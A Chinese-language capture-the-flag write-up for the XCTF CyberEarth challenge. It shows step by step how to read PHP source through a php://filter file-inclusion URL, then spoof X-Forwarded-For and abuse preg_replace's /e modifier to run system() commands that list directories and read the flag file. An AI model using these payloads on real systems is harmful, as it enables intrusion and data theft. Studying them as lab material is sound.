[CTF]文件包含(php伪协议)+代码执行(XCTF 4th-CyberEarth)

原作者:admin

[原理]
文件包含读源码、x-forwarded-for

preg_replace 函数执行一个正则表达式的搜索和替换,preg_replce正则表达式部分包含e参数的时候,进行替换的部分会被执行。

[目的]
掌握正则表达式、伪协议读取源码

[环境]
windows

[工具]
firefox、burp

[步骤]
1.进入云平台设备维护中心页面,利用php伪协议读取源码。

http://111.198.29.45:44740/index.php?page=php://filter/convert.base64-encode/resource=index.php

2.将得到的源码进行base64解密处理,获取到index.php的源码,在121行可以发现后门,如图所示。

[CTF]文件包含(php伪协议)+代码执行(XCTF 4th-CyberEarth)_第1张图片

3.对此段代码进行审计,可以发现需要将X_FORWARDED_FOR设置为127.0.0.1,并且用get方式传递三个参数传递给preg_replace函数。

这里介绍一下preg_replace函数:

[CTF]文件包含(php伪协议)+代码执行(XCTF 4th-CyberEarth)_第2张图片

其实就是PHP里的正则表达式,这里可以用/(.*)/e,preg_replace函数可以进行代码执行的:

[CTF]文件包含(php伪协议)+代码执行(XCTF 4th-CyberEarth)_第3张图片

不过还要注意一点:
[CTF]文件包含(php伪协议)+代码执行(XCTF 4th-CyberEarth)_第4张图片

4.使用burp修改http请求头参数,添加X_FORWARDED_FOR,将url设置为

/index.php?pat=/(.*)/e&rep=system('ls')&sub=aa 可以查看文件列表,如图所示。

[CTF]文件包含(php伪协议)+代码执行(XCTF 4th-CyberEarth)_第5张图片

5.将url设置为 /index.php?pat=/(.*)/e&rep=system('ls+s3chahahaDir')&sub=aa 查看s3chahahaDir文件夹,发现flag文件夹。

6.将url设置为 /index.php?pat=/(.*)/e&rep=system('ls+s3chahahaDir/flag')&sub=aa 查看flag文件夹,发现flag.php文件。

7.将url设置为 /index.php?pat=/(.*)/e&rep=system('cat+s3chahahaDir/flag/flag.php')&sub=aa 查看flag,如图所示。

[CTF]文件包含(php伪协议)+代码执行(XCTF 4th-CyberEarth)_第6张图片

转载于:https://www.cnblogs.com/-mo-/p/11572416.html

你可能感兴趣的:([CTF]文件包含(php伪协议)+代码执行(XCTF 4th-CyberEarth))